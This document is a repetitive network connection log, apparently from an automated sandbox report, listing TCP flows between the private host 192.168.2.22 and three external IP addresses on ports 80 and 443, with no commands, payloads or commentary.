Source: global traffic	TCP traffic: 172.67.163.184:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.163.184:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 172.67.163.184:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.163.184:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 172.67.163.184:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.163.184:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.163.184:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 172.67.163.184:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 104.21.34.183:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 104.21.34.183:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.34.183:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 104.21.34.183:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.34.183:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 104.21.34.183:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.34.183:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 104.21.34.183:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 104.21.34.183:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.34.183:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 104.21.34.183:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49165
